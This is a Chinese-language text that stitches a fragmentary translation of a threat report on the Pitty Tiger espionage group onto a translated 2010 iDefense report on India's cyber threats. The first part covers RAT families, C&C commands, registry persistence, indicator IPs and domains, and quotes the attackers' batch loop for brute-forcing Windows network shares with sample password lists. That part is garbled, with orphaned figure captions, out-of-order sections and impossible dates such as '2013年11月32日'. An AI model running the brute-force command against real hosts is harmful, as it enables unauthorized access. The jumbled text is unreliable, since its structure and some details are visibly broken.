->S:Microsoft Windows XP Service Pack 3 5.1 2600

->M:Nov 13 2013

->P:1033

它包含计算机名称、用户名、内网IP、系统版本、RAT内部版本和系统语言ID。

接着CT RAT接收来自C&C服务器的命令。通常被执行的RAT功能如下：

• 文件下载（GET）和上传（PUT）
• 远程shell（ocmd/ccmd）
• 配置上传（cfg）
• 休眠（sleep）

3.3、版本和作者（们）

关于RAT配置，我们的样本是和“sop.avstore.com.tw”进行通讯，其中包含的“Mov 13 2013”字符串应该是版本识别码。

C&C服务器部分是用.NET编写的Windows二进制程序。我们发现了两个版本：

• 仅作为CT控制端的版本 2013.10
• 可作为CT和PittyTiger控制端的版本 2013.12

“关于”窗口给出了开发者（们）的名字：

和测试主机交互的CT RAT控制端

CT/PittyTiger控制端

CT console (compatible pittytiger) v1.3

2013.12 by Trees and snow

关于该作者的更多描述在后面我们会提到。

4、MM RAT（AKA TROJ/GOLDSUN-B）

在调查之初，且尚未命名为“Troj/Goldsun-B”之前，我们将这个恶意软件名为为“MM RAT”。这是Pitty Tiger的小伙伴常使用的另一个远程管理工具。我们已经能够获得它的客户端和服务器端部分。

4.1、安装

我们发现的样本名字是3200.exe，在sandbox中触发的警报如下：

Troj/Goldsun-B触发的sandbox警报

恶意软件释放的文件

Key Path: \REGISTRY\USER\<SID>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Value Name: Shell

Value: explorer.exe,C:\DOCUME~1\<UserName>\APPLIC~1\<binary name>,

MM RAT嵌入有自己的DNS服务器IP地址来做C&C域名解析。这些DNS地址的列表如下：

• 63.251.83.36
• 64.74.96.242
• 69.251.142.1
• 212.118.243.118
• 216.52.184.230
• 61.145.112.78
• 218.16.121.32

4.2、命令&控制

MM RAT在进程注入后开始进行域名解析，并立即发送请求。首次请求用来检查更新（GET /httpdocs/update/update.ini），然后发送Hello数据包：

Troj/Goldsun-B发送给C&C服务器的Hello数据包

• 使用密码进行C&C服务器验证
• 远程Shell
• 远程命令
• 文件下载/上传/删除/搜索
• 终止Bot

• Vip：测试连接情况
• Owpp4：注册新bot
• CReply：响应远程命令
• Clrf：清除远程文件（读取之后清除ComMand.sec）
• CFile：传输文件（文件传输或响应命令）
• Cerr：发送错误

Paladin RAT在sandbox中触发的警报

C:\Documents and Settings\<User>\Local Settings\Temp\svohost.exe

Sandbox中恶意软件释放的文件

测试机中的Paladin控制端

Paladin的多种功能：文件传输、截屏、cmd shell

Leo恶意软件控制端截图——Gh0st RAT的变种

Domain Name: avstore.com.tw

Registrant:

information of network company

longsa longsa33@yahoo.com

+86.88885918

No.520.spring road.shenyang

shanghai, shanghai

CN

这些信息也被用来注册其他域名，像是skypetm.com.tw，同样是被Pitty Tiger所使用。

1.2、恶意软件家族

我们的研究引导我们发现了和avstore.com.tw子域名相关的四个不同的恶意软件家族：

• PittyTiger RAT（又叫Backdoor:Win32/Ptiger.A）
• Troj/ReRol.A
• CT RAT
• Paladin RAT（Gh0st RAT的变种）

​连接到avstore.com.tw的文件MD5列表

恶意软件样本、恶意软件家族和avstore.com.tw子域名的关联

Avstore.com.tw基础架构：主机和子域名

• 2011年12月29日至2013年1月2日

Registrant :chenzhizhong Email : hurricane_huang@163.com Telephone : +86.2426836910

• 2013年11月32日至今

Registrant : long sa Email : longsa33@yahoo.com Telephone : +86.88885918

2.2、恶意软件家族

和子域名skypetm.com.tw进行通讯且已识别的有六个恶意软件家族：

• MM RAT
• Pitty Tiger RAT
• Troj/ReRol.A
• CT RAT
• Paladin
• Exadog​

Skypetm.com.tw基础架构：子域名和恶意软件连接

3、两个域名的共同特征

3.1、恶意软件家族和样本

Avstore.com.tw和skypetm.com.tw的共同特征是皆与四个恶意软件家族进行网络通讯：

恶意软件样本、IP地址以及C&C服务器的连接

Pitty Tiger所用域名之间的联系

基于邮箱地址的Pitty Tiger所有域名注册信息的时间线

• 一家公司来自安全行业；
• 一家公司来自能源行业；
• 一家公司来自电信行业；
• 一家公司擅长于web开发。

• 来自同一家公司的某个人已经被这些文档所攻击。
• 来自其他公司的某个人已经被这些文档所攻击，这些所谓的其他公司可能是这家安全公司的合作伙伴或竞争对手。

2014年4月初至204年七月初，攻击者和一台C&C服务器之间的RDP连接

CHMXY-PC所用的IP地址

计算机TIEWEISHIPC所用的IP地址

计算机FLY-THINK所用的IP地址

计算机50PZ80C-1DFDCB8所用的IP地址

攻击者的两台计算机叠加后的IP段

攻击者和一台C&C服务器的RDP连接

2014年2月10日，用户“Toot”在名为“toot-2a601225a8”的计算机登陆到CT RAT

2014年4月9日，用户“Toot”在名为“toot-2a601225a8”的计算机登陆到CT RAT

2014年4月9日，用户“Toot”在名为“toot-2a601225a8”的计算机登陆到CT RAT

CT console (compatible pittytiger) v1.3 2013.12 by Trees and snow

Pitty Tiger组织角色关系图

• 恶意软件（Troj/ReRol.A）
• 远程管理工具（MM RAT、CT RAT、PittyTiger、Paladin）
• 邮箱刺探工具（cp.exe、mailpv.exe）
• 密码导出工具（gsecdump、NirSoft工具、Mimikatz等等）
• 网络扫描器（pr.exe）
• 网络导向工具（po.exe）
• 漏洞扫描工具（ssql.exe、流光等）

for /f "tokens=1,2 delims= " %%i in (user.txt) do (net use  \\<TARGETEDIP>\ipc$ "%%j" /u:%%i) 

&& (net use \\<TARGETEDIP> /del) && (echo user:%%i pass:%%j>>succ.txt)

administrator nameofonetargetedcompany

administrator !Password

administrator azerty123

…

administrateurnameofonetargetedcompany

administrateur !Password

administrateur azerty123

…

<username>nameofonetargetedcompany

<username> !Password

<username> azerty123

…

<anotheruser>nameofonetargetedcompany

<anotheruser> !Password

<anotheruser> azerty123

…

用于暴力破解网络共享的文件

• 针对目标所使用的几款中文漏洞扫描器；
• 在攻击者C&C服务器中发现所使用的中文工具：8uFTP、中文版calc.exe等；
• 来自相同开发者的两款RAT：CT RAT和PittyTiger RAT。这些RAT的控制端显示的皆是中文；
• 攻击者所使用的几个二进制程序的资源语言ID要么是“中文 - 中国”，要么是“中文 - 台湾”；
• 用中文撰写的诱饵Word文档。

C&C服务器的托管信息关系图

攻击者和C&C的RDP连接图

• acers.com.tw
• kimoo.com.tw
• paccfic.com
• foxcom.com.tw
• dopodo.com.tw
• trendmicroup.com
• lightening.com.tw
• avstore.com.tw
• helosaf.com.tw
• trendmicro.org.tw
• stareastnet.com.tw
• symantecs.com.tw
• seed01.com.tw
• skypetm.com.tw

原文：iDefense全球威胁调查报告（GTRR）《The Cyber Threat Landscape in India》（2010年1月30日）

翻译：刘盖特

一、摘要

印度是一个充满反差和多样化的国家，其众多的族群、信仰、语言和政治变化构成了如今的文化和社会。印度最近也成为了世界IT产业的主角，印度的高等学校有很多的毕业生成为了程序员、计算机工程师或其他IT专业人士，这其中有许多人工作在在美国、澳大利亚、欧洲和全球其他国家。同时，班加罗尔地区也已经演变为印度的硅谷，那里运营着数量庞大且多样的IT公司。随着这种在信息和通信技术（ICT）方面激增式的发展，一个值得注意且充满IT安全挑战的特色网络已然在印度形成。

印度的IT安全挑战主要集中在来自斯里兰卡、巴基斯坦、马来西亚、印度尼西亚、泰国、中国和俄罗斯等地组织缜密的跨国团伙进行的信用卡和银行卡欺诈方面。这里也有大量的僵尸网络和命令与控制服务器（C&C）以及数量可观的旨在攻击本地和国际商务业务的钓鱼网站。iDefense分析师有充足的证据表明中东地区存在有政治动机的黑客主义（即黑客行为），在印度也是如此；由于其复杂和动态的社会政治性，黑客主义是普遍存在的，但是相对于其他信息安全威胁来说其危险性几乎可以忽略不计。

除了类似僵尸网络、银行欺诈、数据偷窃或网络间谍等纯粹的基于网络的威胁之外，在印度还有更多的基于真实世界的威胁。在这些威胁中可能有也可能没有网络因素，但都存在对国家的商业运营产生显著影响的可能性。这些威胁包括恐怖主义、政治暴力、政治官僚主义导致的贪污腐败和内部威胁的可能性，尤其是在业务流程外包的厂商，可能会涉及到世界各地公司的大量高敏感度和有价值的商业信息。

二、网络威胁概览矩阵

图2-1显示了对印度所有主要的网络威胁的一个近似评估。依照每种威胁发生的可能性和潜在的重要性进行排列。尽管对于某些类型进行公平可靠的统计是可行的，但是并不一定对其他类型也同样可行。因此，对这些网络威胁的评估是不精确的，而是借鉴了多重可靠数据、独立事件信息和iDefense的实地研究得来的。

图2-1：印度网络安全威胁模型；Y轴表示发生的可能性，X轴表示重要性既可能影响的范围

• 网络钓鱼——印度活跃的钓鱼网站每个月都在波动，印度和国际银行是钓鱼攻击的主要目标。尤其在印度的主要节假日，钓鱼网站会迅速增长。

• 贪污腐败——包括政府官僚主义和其他问题，这在印度是地方性的，但是，其影响和结果都很可能从一个区域到其他区域有着巨大变化。

• 信用卡犯罪——银行和信用卡的盗窃和诈骗仍然是主要问题，信用卡案件在整个印度始终存在且定期发生。

• ATM犯罪——ATM犯罪和信用卡问题是紧密联系的。尽管印度的银行已经采取了更多的对策，但是ATM犯罪仍然是主要的网络威胁之一。

• 僵尸网络感染——根据印度计算机应急响应团队（CERT-In）的报告，有大量的本地僵尸网络，包括成千上万台感染的电脑仍然在运作着。

• 数据偷窃——大量的外包公司掌握了众多包括银行、组织和机构的敏感信息，使得数据偷窃成为了印度网络威胁的重要因素之一。

• 恶意代码——CERT-In 官方发布了有关病毒和蠕虫数量的重要数据。

• 内部威胁——即使在印度腐败的员工偷窃和倒卖敏感专利信息是一个重要问题，尤其是在外包公司、银行和其他可能存在大量有价值信息的地方，但是仍然必须考虑非恶意的内部威胁。这表示那些缺乏IT安全意识和计算机安全习惯（在工作电脑下载私人内容，与他人分享帐号等）的员工，可能泄漏敏感的商业信息。

• 恐怖主义——不是严格意义上的在线威胁，印度会周期性的发生一些恐怖主义和政治动机的暴力。最近在孟买发生的袭击事件，在一些程度上可能有基于网络的部分参与。

• 盗版——软件和媒体盗版在印度很猖獗，这是由多重因素决定的。人们普遍认为在南亚软件的价格对于大部分市民来说太高了，但这些软件却的确是必备的商业工具。

• 黑客主义——在印度具有政治动机的黑客行为是一个重要的问题，但是大部分影响都可以被比较容易的消除（例如篡改页面）。印度黑客经常和巴基斯坦以及中国黑客进行页面篡改争夺站。攻击者们倾向于把目标对准政府组织机构等高调的网站。

• DDoS攻击——考虑到在印度的僵尸网络的平均规模要比那些在俄罗斯、中国、欧洲和美国的要稍微小一些，在印度组织的DDoS攻击更加温和。然而，由于其自然的特性是在世界范围内按比例分布的，所以印度也可能受到从其他国家而来的DDoS攻击。

• 服务中断和数据丢失——这类丢失可能对印度的偏远地区产生更严重的影响，因为其基础设施的备用能源可能并不是随时可用的。

• 网络间谍——虽然印度的网络过滤和审查制度形同虚设，但是在孟买受到恐怖袭击的当周，印度政府就增加了其网络间谍的能力。同时，来自中国等外国权利机构的网络间谍威胁远高于那些本土的间谍行为。

• 网络恐怖主义——尽管印度一些恐怖活动的确使用到了网络科技，但仅止步于此，并没有印度的组织或个人为了恐怖活动而使用一些有效的专业知识去造成大规模的破坏。

三、印度简介

由于人口超过了十亿，印度是一个充满反差和多样化的国家。这个地方分布了400多种不同的语言。根据宗教信仰，这里有基督教、伊斯兰教、佛教和印度的主要信仰印度教的大量教派。同时，印度是一个年轻的国家，刚刚在1947年8月15日从英国殖民地获得独立。下列的信息提供了有关印度社会、政治、经济和地理方面的关键数据：

首都：新德里

主要城市：德里，孟买，班加罗尔，加尔各答，金奈，帕纳吉

GDP：2008年大约1.237万亿（美元）

劳动力规模：估计5.163亿人

生活在贫困线以下的人口比例：2005年大约42%

人均收入：2007年1068（美元）

自1960年以来，印度经济在被政府官僚主义和各种教条限制中仍然发生了巨大的提高。从九十年代起，新的印度政府开始转变这种情形，印度经济到2008年已经增长了一万亿美元。然而，在印度很多地方基于土地的经济和财产形式仍然十分常见，在2007年才刚刚突破人均收入1000美元。在印度，尤其在信息安全领域，教育设施严重缺失。私营企业填补了一部分信息安全需要的缺失。政府和国有企业通常都缺失相关领域受过专业训练的人员，因此需要分配更多的资源用来在现在和未来培养警察、检察官、法官、信息安全专家、律师、法学教授、司法学生、计算机科学和工程学生，使得印度经济增长的主动力信息产业得以发展。

四、网络环境

作为一个非欧美国家，互联网在印度还是一个新的事物，但这也是一个进入的好时机。虽然如此，印度的大多数人民非常的贫穷，在乡村并且没有网络接通。根据多方面资源显示，网络普及率对比人口增长率，从2002到2007年大致发展如下：

下表展示了2009年来自国际电气通讯联盟的常规统计，更加阐明了印度2009年的信息和通信技术环境。

2009年底，印度的互联网普及率高于5%。同时，其宽带普及率暴涨，尤其是从2004年到2006年（见图4-1）。

图4-1：印度宽带订阅量 单位100000（卢比）

考虑到个人电脑对于大部分印度人，尤其是那些贫穷的或者偏远地区的人来说价格是比较高的，所以很难不夸大网吧在形成印度网络方面的作用。同时也很难说清印度网吧的拥有者在运营时有多么的不安全，更不必说那些中东、中亚和印度半岛的情况了。因此，在过去几年中，有很多或真或假的网络恶意行动是在网吧中发生的。这些行动促进了印度一些网吧进行银行密码偷窃并提款等网络犯罪行为。为了帮助遏制这一问题，2008年的IT法修正案中关于网吧的规定做出了重要的改变，然而，这一新的修正案中仍然有一些关于网吧的法律定义有一些潜在的冲突，或者是印度的一些邦早已使用的规定。2008年的IT法修正案要求印度的网吧记录客户的姓名、使用记录和其他管理信息，然而，iDefense调查表明，印度、巴基斯坦、斯里兰卡以及周边的一些国家和地区的很多网吧的拥有者经常使其网吧处于一种极度不安全的状态。在这种管理状态下，不存在访问记录，混乱的电脑绑定了无数的恶意、过期、试用版的软件，甚至完全没有防病毒软件，更不用说分级的用户访问限制了。考虑到这一现象在该地区广泛存在，当局如何在印度的偏远地区实施这一法令是一个亟待解决的问题。尽管如此，印度的网吧仍然为数以百万计的无法购买个人电脑的人提供一个重要的网络接入环境，在未来的印度网络安全中仍然会是一个重要的部分。

在印度，使用最广泛的社交网站有Orkut、Facebook、hi5、LinkedIn、MySpace、ApnaCircle、Bharat Student、BigAdda.com、yaari.com和ibibo。使用这些网站的主要人群年龄在15到35岁之间，他们使用这些网站来通信、与朋友联系、普通的娱乐和一些游戏。这些网站通常都允许用户上传个人信息、照片、博客和工作信息。这些网站的安全问题也很受关注，由于过于自由的隐私政策、缺乏认证机制和容易获得用户的照片和联系人电话等个人信息，Orkut被认为是最容易被利用的网站。有很多恶意的假用户在网络上诽谤，甚至制造全国性的煽动内容。印度的青年有约75%是网络用户，zapak.com和kreeda.com上的休闲游戏非常流行，然而，Second Life或The Sims等主题游戏或虚拟游戏在印度还没有正式立足。

4.1、本地黑客组织

随着计算机已经成为印度社会和生活中的重要组成部分，一个本土（北印度语“desi”，意味着土著的，原用来表示印度大陆的事物，即使是英语为母语的印度人）黑客产业在印度逐渐成形。印度黑客的一个重要特征就是大部分都使用英语。鉴于黑客的种族背景，除非是在临时的电子邮件和及时通讯中，否则他们不会使用印度语、泰米尔语、马拉地语或泰卢固语。自从英国殖民印度以来，英语已经变得至关重要，连接了印度不同的种族并成为了商业和高等教育中的主要语言。这一情形意味着印度黑客可以超越阿拉伯或中国黑客，更频繁的参与国际黑客论坛，通过分享知识促进关系增长并与全世界的黑客进行合作。因此，无论是本地的印度黑客还是更广泛意义上的全球的印度黑客，都存在于全球的英语黑客论坛中。

印度著名的黑客组织DigitalMafia（见图4-2，左），目前使用的网站是www.digitalmafia.in。基于网站的WHOIS信息，该组织的出现在孟买东南部60KM的内陆城市普纳。DigitalMafia的网站支持文件自由上传和功能链接分享（在图4-2的屏幕左上方可以看到），并且似乎与在普纳的巴蒂IT解决方案公司的网站托管和设计服务有关，但没有公告板信息或论坛能表明这些网站之间有关联。tn_hackers或者说泰米尔族黑客，是另一个印度的黑客组织，该组织在网络上可以看到一些踪迹，但并不是非常活跃。

图4-2：DigitalMafia主站，印度本土知名黑客组织（左），附属于IT服务公司Bharti IT Solutions的网站。（右）

印度很多黑客创建IT安全博客，例如“Rahul The Desi Hacker”（见图4-3），他们在desihacker.blgspot.com发布黑掉的带有印度电影、音乐和软件等资源的下载网站账户信息。另一个类似的网站hungryhackers.blogspot.com是一个计算机工程学生Ashik Ratnani在负责的。

图4-3：黑客网站“Rahul The Desi Hacker”的截图

4.2、黑客主义

就像其邻国和一些宗教团体一样，例如中东地区，在印度，同样有许多政治动机的黑客行为。这些黑客行为常常发生在印度黑客和关系紧张的巴基斯坦等国的黑客战争之中。尤其是当印度和巴基斯坦在真实世界中的政治关系变紧张时，来自两个国家的黑客就会通过更加激烈的篡改对方网站等攻击方式做出响应（见图4-4）。彩色的政治篡改信息覆盖了印度和巴基斯坦的政府网站，有时候，活动会导致网站的短时失效，但是实质性的持续破坏还未有所闻。

图4-4：印度黑客（左）和巴基斯坦黑客（右）的破坏性攻击

巴基斯坦不是唯一一个与印度时有冲突的邻国。例如，在2008年中，印度政府官方谴责了中国黑客组织在中国政府的赞助和支持下，“在过去的18个月中系统性的攻击了国家服务”。

印度南部的一个邦叫做泰米尔纳德邦，与其名字相符，该邦的居民大部分是泰米尔人，这个种族与印度北方的人种有很大区别。泰米尔纳德邦的居民与斯里兰卡泰米尔人有密切关系，斯里兰卡泰米尔人就是在过去两个世纪在斯里兰卡被英国的种茶者雇佣来运营茶种植园的人，也是印度泰米尔人的祖先。在二十世纪时，为了斯里兰卡泰米尔人能够在北部斯里兰卡独立，泰米尔·伊拉姆猛虎解放组织发动了充满血腥的针对斯里兰卡政府的独立战争。由于这些原因，也导致了斯里兰卡和印度多年的紧张关系。印度的泰米尔族黑客在过去多年还提供了他们的专业技术给猛虎解放组织，据报道，在2007年，猛虎组织的专业黑客攻击了国际通讯卫星并且利用它散步了组织的信息和宣传材料。斯里兰卡军队在2009年击败了猛虎组织。

然而，篡改攻击在印度的网络安全环境中已然成为了一种约定俗成的模式。根据CERT-In的消息，与2008年同期相比，在2009年二月到十月，在诸如“.com”和“.in”等通用域名下的印度网站篡改攻击事件同比增长了14%，达到了5239次（见图4-5）。黑客在2009年十月一个月就篡改了1118个网站，而在2009年8月这一数据还是692个，在2008年9月只有503个。

图4-5 印度CERT展示了印度网站被篡改数量急剧增长，按顶级域名划分

像中国和俄罗斯一样，印度也有一部分民族主义黑客。为了回应最近的针对澳大利亚（像在美国和英国一样，这里存在一个印度社区）印度移民和留学生的敌意行为，一名叫Atul Dwivedi的印度黑客篡改了澳大利亚皇家空军的网站并留下信息警告澳大利亚政府停止针对印度学生的种族主义攻击。尽管这个篡改并没有对皇家空军的网站造成严重的威胁，但是由于印度黑客的攻击行为导致的政治尴尬，使得在当周印度和澳大利亚在外交上关于针对在澳大利亚的印度留学生的一大批种族主义攻击变得非常紧张。

4.3、盗版

作为一个亚洲国家，软件和数字媒体的盗版在印度十分猖獗（见图4-6）大约69%使用的程序是盗版。尽管如此，根据商业软件联盟公司的一项全球软件盗版研究，在印度的盗版使用率依旧降低了，但是主流软件公司比如Adobe Systems、Microsoft和Autodesk 仍然损失了大概27亿美元。

图4-6：印度最受欢迎的两家软件和媒体盗版网站

同时，印度文件分享论坛和种子追踪网站都有增长。这些论坛和网站提供最新的软件并为印度观众分享了迄今为止规模最大的盗版音乐和电影。

4.4、内部威胁

有两种问题使得内部威胁成为了印度一个重要的安全影响因素，一是内部的有策划的恶意行为，二是无意的意外内部威胁。意外的内部威胁在印度是一个重要的风险，因为即使是有平均教育水平的人，甚至一些受到高等教育的人，也很有可能普遍缺乏信息安全意识和对信息安全的关注。例如，有些本地员工可能毫无意识的与其他员工或外部的朋友分享公司的电脑系统的登录认证信息。缺乏信息安全意识也可能会从音乐网站下载到被恶意侵染的个人文件，或者木马通过入侵员工正在进行的即时通讯而威胁到公司的电脑系统。

同时，内部蓄意的攻击在印度也时有发生。尤其是对于一些规模较大的拥有大量跨国公司敏感信息的印度外包公司。尽管印度政府近来已经在强调加强网络犯罪方面的立法行为，但实际上，这些案件对印度的法律系统产生了严重的负担（参见“污腐败和法律障碍”）。审讯一个公司宣称的内部威胁活动和不会帮助破案的被告可能会花上几年时间。

因此，无论是对于一个外包类型的印度公司或其他公司，都非常有必要执行严格的审查和监督机制来监管公司的活动，并持续跟踪他们收到的信息和信息所有者。尽管给一个印度外包公司常规的外包信息不太会带来特殊的威胁，但是iDefense仍然不建议外包任何有大量敏感信息的部分，更不用说最敏感信息。同时公司也应该对外包过程保持持续监管和现场监督。

4.5、数据偷窃

数据偷窃的风险因素和内部威胁现象的类似，所以前文所提到的也同样适用于印度的数据偷窃问题上。同时，为了帮助缓解印度的数据安全问题，印度最被认可和知名的信息软件和服务交易组织——国家软件和服务公司协会（NASSCOM）对服务提供商员工采取了以下若干措施来解决数据安全问题：

• 印度的公司通过使用国家信息专业人员技能注册系统来管理员工的背景信息，例如可以通过该系统来追踪员工的雇佣历史。

• 计划建立一个独立的自主管理的组织来设置和监控数据安全和隐私是对印度外包服务提供者的“最优方法”。服务提供者正在逐渐适应合规计划和全方位的安全审计（包括人员和设备审计），来避免敏感信息和数据的滥用。承诺项目包括培训员工以加强其保密意识，培训电脑系统管理员关于安全电脑系统，常见信息安全威胁，访问控制技术，风险评估和管理，入侵检测，认证和其他类似的项目。

同时，印度政府采取了多种手段提高数据安全标准。在2009年初，政府寻求电信运营商、软件开发者和互联网服务提供商为在线银行交易等敏感信息传输设计管理条例并提升加密标准的等级。然而，即使政府尝试将加密标准从现有的40位变为128位，直至最后变为欧美的256位标准，但在2008年，政府还强制国家的互联网提供商降低加密标准到40位。这里的理由是印度的安全机构缺乏监控网络上加密标准高于40位的数据传递的技术手段。许多行业的专家认为较低的数据加密标准是导致印度的网络交易较少的原因。这一加密问题源起2008年初，当时的通信部门威胁要禁止加拿大的RIM（黑莓）公司，因为其生产的手机设备使用256位的高级加密标准而受到商务人士的喜爱，而通信部门要求RIM公司降低其数据安全标准到40位加密标准使得印度的安全机构可以进行窃听工作。

4.6、数据丢失与服务中断

像世界其他地区一样，在印度，数据丢失和服务中断的可能性与所在的地域有很大关系。当然，在更偏远的乡村，电力供应、互联网连接和其他信息和通信技术准备不充分的地区，这一问题会带来更大的威胁。多数情况下，活跃的连接主要集中在印度的大量外包产业部署的主要大都市和像班加罗尔这样的信息产业中心，服务中断这样的问题少到难以造成影响。

4.7、网络钓鱼

根据CET-In统计，网络钓鱼在印度是一项大规模的网络安全问题。就像其他国家一样，银行部分是最容易被列为钓鱼攻击对象的（见表4-7，左），对银行和其他品牌的一些钓鱼攻击也是来自于印度的（例如印度银行、工业和服务业）（见图4-7，右）。

图4-7：钓鱼攻击目标（左）；2009年印度钓鱼网站攻击的商业品牌来源国（右）

根据CERT-In的报告，2008年平均有47个运行中的钓鱼网站，而2008年九月这一数量达到了86个。这很可能是由于期间众多印度胡里节，例如从2009年9月19日开始的连续10天的九夜节造成的。大量的在线礼物购买，尤其是印度大量成长中的中产阶级普遍拥有了个人电脑，使得他们成为了钓鱼网站的重要目标。

图4-8：印度从2008年3月到2009年3月钓鱼网站的数量变化

4.8、银行卡、ATM犯罪和银行诈骗

信用卡欺诈在印度也是一个增长迅速的问题，根据孟买网络犯罪警察的统计，2009年十月，孟买登记的网络犯罪案件数第一次超过了例如谋杀、强奸和抢劫等真实犯罪的案件数。超过1062起网络犯罪案件投给了孟买警察网络犯罪调查室和刚成立4个月的位于Bandra-Kurla Complex的网络警察局。这一数字包括了城市中所有种类的犯罪类型包括谋杀强奸和其他物理犯罪。网络犯罪案件从2005年的142，2006年的159起，2007年的344起到2008年的775起。此外，犯罪警察理事Deven Bharati认为网络犯罪的兴起是因为罪犯会认为通过网络犯罪会比进入家庭或办公室更加容易。印度互联网专家Vijay Mukhi则认为网络犯罪率的提升与印度法律对网络犯罪管理不严有关。另一项统计表明了信用卡诈骗的增长原因，印度第二大银行ICICI在2009年三月报告称，在2008年因为8280起信用卡诈骗案件导致了1.1亿（240万美元）的损失。

4.9、僵尸网络

CERT-In的统计同样也证实了有大量的僵尸网络的C&C服务器在印度（见图4-9）。其中大部分的僵尸网络要比西方、俄罗斯或中国的规模要小，平均每个网络不超过一千台感染机器。2009年11月，CERT-In在印度追踪到18个僵尸网络的C&C服务器和49759台感染的机器。

4.10、恶意代码

根据CERT-In的最新有效统计，市民在2009年11月共提交了787个电脑安全事件到CERT-In。这其中有28%包含了恶意代码（例如病毒和蠕虫）。

4.11、恐怖主义和政治暴力

在印度有许多的威胁，尽管大部分是来自真实世界的，但是有一些网络环境下的问题或者是有潜在的对印度网络环境造成影响的威胁。这其中最重要的就是恐怖主义和政治暴力，尽管印度政府致力于与暴力极端主义作斗争，但是过时和过劳的执法机构以及法律体系妨碍了印度政府的反恐怖主义效果。在最近的孟买恐怖袭击时，印度议会提出了重建反恐法律法规的议案并提议组建新的反恐机构NIA以调查和控告恐怖活动。除了孟买的恐怖袭击（现在在印度用“26/1”1表示此事），还有许多被目击的未公开事件，例如下列2008年的典型事件：

• 5月13日，在斋浦尔的印度寺庙里发生了系列爆炸案，该爆炸案导致至少60人死亡和150人受伤。

• 6月29日，在Orissa邦东部的马尔坎基里区，毛派叛乱分子袭击并杀死33名安全部队成员。

• 7月25日，恐怖分子在班加罗尔的商业和工业区域制造了系列爆炸案，爆炸案造成至少1人死亡和8人受伤。

• 7月26日，在古吉拉特首府甘地讷格尔，21个爆炸装置杀死了54人并导致至少156人受伤。这些爆炸发生在市场，公交和其他车辆上，在医院还有正在接受治疗的第一次系列爆炸案伤员。

• 9月13日，恐怖分子在新德里的集市等人口密集区域引爆了一系列炸弹，导致至少20人死亡和超过80人受伤。

• 10月30日，在阿萨姆邦东北地区，恐怖分子引爆了9个炸弹，杀死了约110人。

印度东部很早以来就存在毛派极端主义和分裂分子对国家法令和控制、管理结构和统治阶级的挑战。在2008年，印度东部发生了50起恐怖袭击并导致约500人死亡。同时，美国的国家反恐中心事件跟踪系统报告了从2004年1月1日到2009年3月31日在印度共发生了4612起恐怖事件。

下列项目由印度政府发布，暗示有着纯粹的历史政治暴力的恐怖组织。除了东印度的分裂组织（靠近孟加拉国的阿萨姆邦有很多类似活动），还有各种共产主义好战组织，锡克教的分裂主义组织和印度教以及伊斯兰教的极端组织，后来的很多组织都有跨国关系，例如和巴基斯坦（如虔诚军），或者和中东及世界其他国家（如基地组织）。

• United Liberation Front of Assam (ULFA) 

• National Democratic Front of Bodoland (NDFB) in Assam

• People’s Liberation Army (PLA)

• United National Liberation Front ( UNLF ) 

• Kangleipak Communist Party (KCP) 

• Manipur People’s Liberation Front ( MPLF ) 

• Revolutionary People’s Front (RPF ) in Manipur

• All Tripura Tiger Force (ATTF)

• National Liberation Front of Tripura (NLFT ) in Tripura

• Achik National Volunteer Council ( ANVC ) in Meghalaya

• Babbar Khalsa International

• Khalistan Commando Force

• nternational Sikh Youth Federation

• Lashkar-E-Taiba/Pasban-E-Ahle Hadis

• Jaish-E-Mohammed/Tahrik-E-Furqan

• Harakat-Ul-Mujahideen

• Harakat-Ul-Ansar

• Harakat-Ul-Jehad-Ul-Islami

• Hizb-Ul-Mujahideen

• Pir Panjal Regiment

• Al-Umar-Mujahideen

• Jammu And Kashmir Islamic Front

• Liberation Tigers of Tamil Eelam (LTTE)

• Students Islamic Movement Of India

• Deendar Anjuman

• Communist Party of India (Marxist-Leninist)-People’s War,  All Its Formations And Front Organisations 

• Maoist Communist Centre (MCC), All Its Formations And Front Organizations

• Al Badr 

• Jamiat-Ul-Mujahidin 

• Al-Qaida 

• Dukhtaran-E-Millat (DEM) 

• Tamil Nadu Liberation Army (TNLA) 

• Tamil National Retrieval Troops (TNRT) 

• Akhil Bharat Nepali Ekta Samaj (ABNES) 

尽管最近的26/11孟买袭击事件严格意义上说是“真实世界”的恐怖活动，并没有对印度的信息基础设施进行攻击，但是攻击人员在行动过程中的确使用到了卫星手机和全球定位系统（GPS）。恐怖分子也攻击了Wi-Fi系统以在对阿默达巴德和德里攻击后的余波中进行恐怖邮件的传播。

按照CERT-In提供的追踪信息，在2005年2月到2008年1月，印度政府网站收到了很多攻击。这些攻击并不是毫无联系的业余黑客的自发行为，而更像是某种针对印度政府网站的有组织的协作良好的攻击行为。

4.12、贪污腐败和法律障碍

贪污腐败和法律障碍是“真实世界”中的威胁，但是的确会影响到国家的在线商业活动行为。印度是2005年十二月生效的联合国反腐败公约签约国。在2004年，印度当选十大最腐败的国家之一，从0分（最腐败）到10分（最清廉），印度得分2.9，位列150个国家的第88位，与加蓬、马里、马尔代夫、坦桑尼亚和伊朗并列。国际透明组织发布的印度2005年贪污腐败调查中显示，平民为了他们本应免费享受的公共服务而贿赂。警察被认为是印度贪污腐败最多的政府部门。各种调查表明腐败的政治家、警察和罪犯以及高级军官之间互相勾结。

中央调查局2005年进行的突击检查，在54个城市的198个地方捕获了70位贪污腐败的官员。同时，阿萨姆邦被排名为印度最腐败的邦，其后是卡纳塔克邦、拉贾斯坦邦、恰尔康得邦、哈里亚纳邦、泰米尔纳德邦和比哈尔邦。

根据国际透明组织最近的年度报告，印度的警察收受贿赂的现象非常严重。至于人权问题就是另一回事了。人权观察组织在2009年八月的报告“破损的系统：印度警察职权滥用和不受监管”中提到，印度警察通过“收受贿赂、武断的逮捕，非法拘留和虐待罪犯以及私自执行私刑”等各种行为贪污腐败。

为了阐明这些问题的源头，人权观察组织报告表示印度的警察必须在恶劣的环境下工作，缺少必须的设备以及持续的“沉重的”工作负担，是联合国建议的日常警察工作量的两倍。因为印度警察的工资水平很低，有较强能力的人不会在警察局通过贪污腐败获得，而会到提供了更好条件的私人企业（例如当律师或者在金融机构调查和保证印度网络安全和网络安全法律的管理）。

印度的立法进程也是以迟缓出名，等待了多年的政府决策，只有当恐怖分子袭击了孟买之后，印度议会才终于通过了2008年的IT法案修正案。早在很久以前就有抱怨应该对恐怖主义进行规定，一直到新的修正案通过才做出了这样一个规定。迄今为止，印度还没有签署或批准欧洲网络犯罪公约，甚至没有展示任何这方面的动向，而在2008年针对IT法案的的修正案正表明了对该类公约的要求。

